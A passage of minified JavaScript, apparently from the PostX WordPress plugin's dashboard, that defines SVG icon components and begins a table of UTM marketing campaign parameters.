1-6.485-1.713 4.573 4.573 0 0 1-.588-2.917c.013-.1.031-.2.05-.3m13 3.226a.647.647 0 0 0 .3-.627v-6.4l2.07 1.137v5.367a.637.637 0 0 0 0 .112 4.75 4.75 0 0 1-7.441 3.851 7.315 7.315 0 0 1-.467-.356z",transform:"translate(0 .001)"})),r.fs_comment=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50",height:"50.003",viewBox:"0 0 50 50.003"},(0,a.createElement)("path",{id:"Path_2150","data-name":"Path 2150",d:"M25,11.6c-21.64,0-25,2.79-25,20.8C0,46.131,1.963,51.017,12.476,52.567V61.6l10.646-8.4c.611.005,1.235.008,1.878.008,21.65,0,25-2.8,25-20.81S46.65,11.6,25,11.6m0,18.04a2.765,2.765,0,1,1-2.76,2.76A2.768,2.768,0,0,1,25,29.642m-9.53,0a2.765,2.765,0,1,1-2.76,2.76,2.768,2.768,0,0,1,2.76-2.76m19.06,5.53A2.765,2.765,0,1,1,37.3,32.4a2.768,2.768,0,0,1-2.77,2.77",transform:"translate(0 -11.602)",fill:"#037FFF"})),r.fs_comment_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("g",{id:"Group_4357","data-name":"Group 4357",transform:"translate(-221.11 2002)"},(0,a.createElement)("path",{id:"Path_2154","data-name":"Path 2154",d:"M172.35,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2155","data-name":"Path 2155",d:"M181.88,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2156","data-name":"Path 2156",d:"M191.41,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2157","data-name":"Path 2157",d:"M204.65,0H153.58a9.468,9.468,0,0,0-9.47,9.46V60.54A9.468,9.468,0,0,0,153.58,70h51.07a9.46,9.46,0,0,0,9.46-9.46V9.46A9.46,9.46,0,0,0,204.65,0M179.11,51.61c-.64,0-1.26,0-1.87-.01L166.59,60V50.96c-10.51-1.55-12.48-6.43-12.48-20.16,0-18.01,3.36-20.8,25-20.8s25,2.79,25,20.8-3.35,20.81-25,20.81",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50.001",height:"49.997",viewBox:"0 0 50.001 49.997"},(0,a.createElement)("g",{id:"Group_4358","data-name":"Group 4358",transform:"translate(-137.503 1994.592)"},(0,a.createElement)("path",{id:"Path_2151","data-name":"Path 2151",d:"M104.722,20.306H89.545V24.08a4.274,4.274,0,0,1-4.267,4.267H76.261a4.218,4.218,0,0,1-1.812-.424,4.272,4.272,0,0,1-4.107,3.166h-6.1V51.623A5.773,5.773,0,0,0,70.021,57.4h34.7a5.78,5.78,0,0,0,5.782-5.782V26.1a5.789,5.789,0,0,0-5.782-5.793M90.13,47.791H76.835a1.692,1.692,0,0,1,0-3.384H90.13a1.692,1.692,0,0,1,0,3.384m7.778-7.915H76.835a1.692,1.692,0,0,1,0-3.384H97.908a1.692,1.692,0,0,1,0,3.384",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2152","data-name":"Path 2152",d:"M86.1,24.077V15.065a.827.827,0,0,0-.827-.827H80.619a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194h-2a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366v9.646a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2153","data-name":"Path 2153",d:"M71.169,26.82V17.808a.827.827,0,0,0-.827-.827H65.684a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194H64.392a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366V26.82a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("path",{id:"Path_2158","data-name":"Path 2158",d:"M329.38,0H278.3a9.46,9.46,0,0,0-9.46,9.46V60.54A9.46,9.46,0,0,0,278.3,70h51.08a9.466,9.466,0,0,0,9.46-9.46V9.46A9.466,9.466,0,0,0,329.38,0M293.77,17.03a.779.779,0,0,1,.09-.37l3.06-6.2a.834.834,0,0,1,.74-.46h2.01a.833.833,0,0,1,.74,1.2l-2.2,4.44a.825.825,0,0,0,.74,1.19h4.66a.828.828,0,0,1,.83.83v9.01a.828.828,0,0,1-.83.83H294.6a.828.828,0,0,1-.83-.83ZM278.84,29.41V19.77a.946.946,0,0,1,.08-.37l3.06-6.19a.82.82,0,0,1,.75-.46h2a.825.825,0,0,1,.74,1.19l-2.19,4.44a.826.826,0,0,0,.74,1.2h4.66a.824.824,0,0,1,.82.82v9.01a.826.826,0,0,1-.82.83h-9.02a.826.826,0,0,1-.82-.83m50,24.81A5.783,5.783,0,0,1,323.06,60H288.35a5.77,5.77,0,0,1-5.78-5.78V33.68h6.11a4.26,4.26,0,0,0,4.1-3.16,4.257,4.257,0,0,0,1.81.42h9.02a4.274,4.274,0,0,0,4.27-4.27V22.9h15.18a5.791,5.791,0,0,1,5.78,5.79Zm-12.6-15.13H295.17a1.69,1.69,0,1,0,0,3.38h21.07a1.69,1.69,0,1,0,0-3.38M308.46,47H295.17a1.7,1.7,0,0,0,0,3.39h13.29a1.7,1.7,0,0,0,0-3.39",transform:"translate(-268.84)",fill:"#037FFF"})),r.grid_col1=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-770 -381)"},(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 393)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 393)"}))),r.grid_col2=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-858 -381)"},(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 397)"}))),r.grid_col3=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22"},(0,a.createElement)("g",{transform:"translate(-909 -381)"},(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 399)"}))),r.rocketPro=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M10.7991 7.20004C9.69681 7.20004 8.7993 6.30253 8.7993 5.20024C8.7993 4.09795 9.69681 3.20044 10.7991 3.20044C11.9014 3.20044 12.7989 4.09795 12.7989 5.20024C12.7989 6.30253 11.9014 7.20004 10.7991 7.20004ZM10.7991 4.00036C10.1376 4.00036 9.59922 4.53871 9.59922 5.20024C9.59922 5.86177 10.1376 6.40012 10.7991 6.40012C11.4606 6.40012 11.999 5.86177 11.999 5.20024C11.999 4.53871 11.4606 4.00036 10.7991 4.00036ZM0.400132 15.9992C0.335857 15.9993 0.272494 15.984 0.215433 15.9544C0.158371 15.9248 0.109297 15.8819 0.0723848 15.8292C0.0354726 15.7766 0.0118133 15.7159 0.00341887 15.6521C-0.00497556 15.5884 0.00214312 15.5236 0.0241696 15.4632C1.25525 12.0788 2.54952 10.3621 3.87019 10.3621C4.30615 10.3621 4.7133 10.5493 5.08207 10.9173C5.66441 11.4996 5.68521 12.0796 5.60042 12.4635C5.33324 13.6698 3.62941 14.8513 0.536919 15.976C0.49303 15.9917 0.446764 15.9998 0.400132 16V15.9992ZM3.87099 11.1612C3.47503 11.1612 3.00867 11.5084 2.52312 12.1651C2.04557 12.8107 1.56562 13.7306 1.09286 14.9065C2.16076 14.4769 3.01907 14.041 3.65181 13.6066C4.50533 13.0203 4.7581 12.5667 4.81969 12.2899C4.88129 12.0132 4.7821 11.7484 4.51652 11.4828C4.30055 11.2668 4.08937 11.162 3.87019 11.162L3.87099 11.1612Z",fill:"white"}),(0,a.createElement)("path",{d:"M15.5986 0.00079992C13.5228 0.00079992 11.6734 0.352765 10.1 1.0471C8.80329 1.61984 7.693 2.42296 6.79949 3.43566C6.63311 3.62444 6.47872 3.81562 6.33554 4.0076C5.64601 4.05319 4.94048 4.32757 4.23655 4.82352C3.64061 5.24268 3.04227 5.82342 2.45673 6.54894C1.47282 7.76802 0.868084 8.9703 0.842486 9.0207C0.800011 9.10558 0.789106 9.2028 0.81172 9.29498C0.834335 9.38716 0.888995 9.4683 0.96593 9.52388C1.04287 9.57947 1.13706 9.60588 1.23168 9.5984C1.3263 9.59092 1.41518 9.55003 1.48242 9.48305C1.48642 9.47905 1.86878 9.10309 2.52072 8.73433C3.05826 8.43036 3.88698 8.07279 4.88928 8.0096C5.14286 8.65833 5.86838 9.43426 6.21635 9.78222C6.56431 10.1302 7.34024 10.8557 7.98897 11.1093C7.92578 12.1116 7.56821 12.9403 7.26425 13.4779C6.89468 14.1306 6.51952 14.5121 6.51632 14.5153C6.45032 14.5828 6.41026 14.6714 6.40318 14.7655C6.3961 14.8596 6.42247 14.9532 6.47763 15.0298C6.5328 15.1064 6.61322 15.1611 6.70473 15.1842C6.79625 15.2073 6.89297 15.1973 6.97787 15.1561C7.02827 15.1305 8.23055 14.5257 9.44963 13.5418C10.1752 12.9563 10.7559 12.358 11.1751 11.762C11.671 11.0573 11.9446 10.3526 11.991 9.66303C12.1822 9.52065 12.3733 9.36626 12.5629 9.19908C13.5756 8.30557 14.3787 7.19528 14.9515 5.89861C15.6458 4.32597 15.9978 2.47575 15.9978 0.39996V0H15.5978L15.5986 0.00079992ZM2.48552 7.84641C3.24785 6.74013 4.41333 5.36826 5.7268 4.93711C5.20765 5.84661 4.93888 6.68173 4.84209 7.21128C4.02236 7.26546 3.22145 7.48132 2.48552 7.84641ZM8.15376 13.5114C8.51883 12.7761 8.73444 11.9757 8.78809 11.1565C9.31684 11.0597 10.1528 10.7909 11.0615 10.2726C10.6295 11.5836 9.25845 12.7491 8.15296 13.5114H8.15376ZM12.0342 8.59994C10.3703 10.0678 8.64731 10.3998 8.39933 10.3998C8.39773 10.3998 8.23375 10.3966 7.79219 10.0854C7.48422 9.86861 7.12506 9.55984 6.78269 9.21748C6.44033 8.87511 6.13156 8.51595 5.91478 8.20798C5.60361 7.76642 5.60041 7.60244 5.60041 7.60084C5.60041 7.35286 5.93238 5.62984 7.40023 3.966C9.15686 1.9758 11.8454 0.887111 15.1947 0.806319C15.1139 4.15558 14.026 6.84411 12.035 8.60074L12.0342 8.59994Z",fill:"white"})),r.subtract=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightMark=(0,a.createElement)("svg",{width:"14",height:"11",viewBox:"0 0 14 11",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M1 5L5 9L13 1",stroke:"#5ECA70",strokeWidth:"1.5"})),r.plus=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),r.delete=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M18.2 6.5H16c-.4 0-.8-.3-1-.7l-.3-1c-.1-.4-.5-.7-1-.7h-3.5c-.4 0-.8.3-1 .7l-.2 1c-.1.4-.5.7-1 .7H5.8c-.5 0-.8.3-.8.7s.3.8.8.8h12.5c.4 0 .7-.3.7-.8s-.3-.7-.8-.7zM12.5 16.5c0 .3-.2.5-.5.5s-.5-.2-.5-.5V9H6l1.3 9.3c.1 1 1 1.7 2 1.7h5.5c1 0 1.8-.7 2-1.7L18 9h-5.5v7.5z"})),r.edit=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M19.3 18.1h-5.9c-.4 0-.8.3-.8.8s.3.8.8.8h5.9c.4 0 .8-.3.8-.8s-.4-.8-.8-.8zM16.2 11c1.5-1.9 1.5-2 1.6-2 .4-.6.5-1.2.3-1.9-.1-.7-.6-1.2-1.1-1.5 0 0-1.3-1-1.4-1.1-1.1-.9-2.7-.7-3.6.4l-7.7 9.6c-.3.4-.5 1.1-.3 1.7l.7 2.8c.1.3.4.6.7.6h3c.6 0 1.2-.3 1.6-.8 3.2-4.1 5.1-6.4 6.2-7.8zm-1.5-5.3s1.4 1.1 1.5 1.2c.2.1.4.4.5.6.1.3 0 .5-.1.7 0 .1-.4.6-1.1 1.3L12.3 7l.9-1.2c.4-.4 1-.5 1.5-.1zM8.8 17.8c-.1.1-.3.2-.5.2H5.9l-.5-2.2c0-.2 0-.4.1-.5l5.8-7.2 3.2 2.5c-1.7 2.2-4.1 5.3-5.7 7.2z"})),r.duplicate=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M11 9.75c-.69 0-1.25.56-1.25 1.25v9c0 .69.56 1.25 1.25 1.25h9c.69 0 1.25-.56 1.25-1.25v-9c0-.69-.56-1.25-1.25-1.25h-9ZM8.25 11A2.75 2.75 0 0 1 11 8.25h9A2.75 2.75 0 0 1 22.75 11v9A2.75 2.75 0 0 1 20 22.75h-9A2.75 2.75 0 0 1 8.25 20v-9Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M4 2.75A1.25 1.25 0 0 0 2.75 4v9A1.25 1.25 0 0 0 4 14.25h1a.75.75 0 0 1 0 1.5H4A2.75 2.75 0 0 1 1.25 13V4A2.75 2.75 0 0 1 4 1.25h9A2.75 2.75 0 0 1 15.75 4v1a.75.75 0 0 1-1.5 0V4A1.25 1.25 0 0 0 13 2.75H4Z",clipRule:"evenodd"})),r.tabLongArrowRight=(0,a.createElement)("svg",{width:"33",height:"8",viewBox:"0 0 33 8",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M32.8536 4.35355C33.0488 4.15829 33.0488 3.84171 32.8536 3.64645L29.6716 0.464466C29.4763 0.269204 29.1597 0.269204 28.9645 0.464466C28.7692 0.659728 28.7692 0.976311 28.9645 1.17157L31.7929 4L28.9645 6.82843C28.7692 7.02369 28.7692 7.34027 28.9645 7.53553C29.1597 7.7308 29.4763 7.7308 29.6716 7.53553L32.8536 4.35355ZM0.5 4V4.5H32.5V4V3.5H0.5V4Z",fill:"currentColor"})),r.saveLine=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.66667L6.33333 12L13 4",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightAngle=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M17.9333 12.8C18.4667 12.4 18.4667 11.6 17.9333 11.2L8.6 4.2C7.94076 3.70557 7 4.17595 7 5V19C7 19.824 7.94076 20.2944 8.6 19.8L17.9333 12.8Z",fill:"currentColor"})),r.arrowRight=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 12H20M14 5L21 12L14 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.arrowLeft=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21 12H4M10 5L3 12L10 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.fiveStar=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M9.18029 2.60415C9.5027 1.90962 10.4975 1.90962 10.8199 2.60415L12.6 6.43897C12.7314 6.72197 13.0016 6.91689 13.3134 6.95362L17.5362 7.45111C18.3006 7.54117 18.6078 8.47852 18.043 8.99753L14.9193 11.8678C14.6892 12.0792 14.5862 12.394 14.6473 12.6992L15.4762 16.8444C15.6261 17.5942 14.8215 18.1737 14.1496 17.7999L10.4414 15.7375C10.1673 15.585 9.83291 15.585 9.55876 15.7375L5.8506 17.7999C5.17864 18.1737 4.37404 17.5942 4.52397 16.8444L5.35289 12.6992C5.41393 12.394 5.31093 12.0792 5.08084 11.8678L1.95716 8.99753C1.39232 8.47852 1.69954 7.54117 2.464 7.45111L6.68675 6.95362C6.99858 6.91689 7.26875 6.72197 7.40012 6.43897L9.18029 2.60415Z",stroke:"currentColor",strokeWidth:"1.31579",strokeLinejoin:"round"})),r.knowledgeBase=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V7.35702C17.5 6.915 17.3244 6.49107 17.0118 6.17851L13.8215 2.98816C13.5089 2.67559 13.085 2.5 12.643 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V15.8333C2.5 16.7538 3.24619 17.5 4.16667 17.5Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 7.5L9.99984 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 10L13.3332 10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 12.5L11.6665 12.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.commentCount2=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M16.6667 3.33325H3.33341C2.41294 3.33325 1.66675 4.07944 1.66675 4.99992V12.4999C1.66675 13.4204 2.41294 14.1666 3.33341 14.1666H7.08341V17.4999L11.2501 14.1666H16.6667C17.5872 14.1666 18.3334 13.4204 18.3334 12.4999V4.99992C18.3334 4.07944 17.5872 3.33325 16.6667 3.33325Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.66675 9.16659L6.66675 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10 9.16659L10 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13.3333 9.16659L13.3333 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.customerSupport=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.1665 7.5C4.1665 4.73857 6.77818 2.5 9.99984 2.5C13.2215 2.5 15.8332 4.73857 15.8332 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.8333 14.1667V15.8334C15.8333 16.7539 15.0872 17.5001 14.1667 17.5001H10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M3.42064 7.99896L2.038 8.91951C1.80593 9.07401 1.6665 9.33434 1.6665 9.61317V12.0538C1.6665 12.3327 1.80593 12.593 2.038 12.7475L3.42064 13.6681C3.88395 13.9765 4.47696 14.0133 4.97485 13.7645C5.50087 13.5016 5.83317 12.964 5.83317 12.376V9.29101C5.83317 8.70301 5.50087 8.16542 4.97485 7.90253C4.47696 7.65369 3.88395 7.69048 3.42064 7.99896Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.0248 7.90253C15.5227 7.65369 16.1158 7.69048 16.579 7.99896L17.9617 8.91951C18.1938 9.07401 18.3332 9.33434 18.3332 9.61317V12.0538C18.3332 12.3327 18.1938 12.593 17.9617 12.7475L16.579 13.6681C16.1158 13.9765 15.5227 14.0133 15.0248 13.7645C14.4988 13.5016 14.1665 12.964 14.1665 12.376V9.29101C14.1665 8.70301 14.4988 8.16542 15.0248 7.90253Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.facebook=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 1.875C2.90101 1.875 1.875 2.90101 1.875 4.16667V15.8333C1.875 17.099 2.90101 18.125 4.16667 18.125H9.51011V12.2281H7.91667V9.86675H9.51011V8.84924C9.51011 6.2191 10.7004 5 13.2825 5C13.7721 5 14.6168 5.09601 14.9624 5.19201V7.33258C14.78 7.31338 14.4632 7.3038 14.0696 7.3038C12.8026 7.3038 12.313 7.78373 12.313 9.03161V9.86675H14.8371L14.4034 12.2281H12.313V18.125H15.8333C17.099 18.125 18.125 17.099 18.125 15.8333V4.16667C18.125 2.90101 17.099 1.875 15.8333 1.875H4.16667Z",fill:"currentColor"})),r.typography=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"15",height:"15",rx:"1.66667",stroke:"currentColor",strokeWidth:"1.25"}),(0,a.createElement)("path",{d:"M5.83203 7.91671V6.66671C5.83203 6.20647 6.20513 5.83337 6.66536 5.83337H13.332C13.7923 5.83337 14.1654 6.20647 14.1654 6.66671V7.91671M9.9987 5.83337V14.1667M7.91536 14.1667H12.082",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.reload=(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3.43552 16C4.90822 18.9634 7.96628 21 11.5 21C16.4706 21 20.5 16.9706 20.5 12C20.5 7.02944 16.4706 3 11.5 3C7.96628 3 4.90822 5.03656 3.43552 8M8.5 8.5H3V3",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.border=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.33398 2.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M2.5 11.6666L2.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M8.33398 17.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M17.5 11.6666L17.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 17.5H4.16667C3.24619 17.5 2.5 16.7538 2.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 2.5H15.8333C16.7538 2.5 17.5 3.24619 17.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.boxShadow=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"12.5",height:"12.5",rx:"0.833333",stroke:"currentColor",strokeWidth:"1.25",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15 5H16.6667C17.1269 5 17.5 5.3731 17.5 5.83333V6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5 15V16.6667C5 17.1269 5.3731 17.5 5.83333 17.5H6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5007 15.8333V16.6666C17.5007 17.1268 17.1276 17.4999 16.6673 17.4999H15.834",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8.75 17.5H10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.291 17.5H13.7493",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 8.75V10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 12.2916V13.75",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}));const o=r},2044:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});const a={example:{source:"db-postx-featurename",medium:"block-feature",campaign:"postx-dashboard"},db_hellobar:{source:"db-postx-hellobar",medium:"summer-sale",campaign:"postx-dashboard"},explore_pro_feature:{source:"db-postx-wizard",medium:"explore-features",campaign:"postx-dashboard"},ticket_support:{source:"db-postx-wizard",medium:"ticket-support",campaign:"postx-dashboard"},postx_doc:{source:"db-postx-wizard",medium:"postx-doc",campaign:"postx-dashboard"},addons_popup:{source:"db-postx-addons",medium:"popup",campaign:"postx-dashboard"},builder_popup:{source:"db-postx-builder",medium:"popup-upgrade-pro",campaign:"postx-dashboard"},block_docs:{source:"db-postx-editor",medium:"block-docs",campaign:"postx-dashboard"},blockProFeat:{source:"db-postx-editor",medium:"pro-features",campaign:"postx-dashboard"},blockUpgrade:{source:"db-postx-editor",medium:"block-pro",campaign:"postx-dashboard"},blockPatternPro:{source:"db-postx-editor",medium:"blocks-premade",campaign:"postx-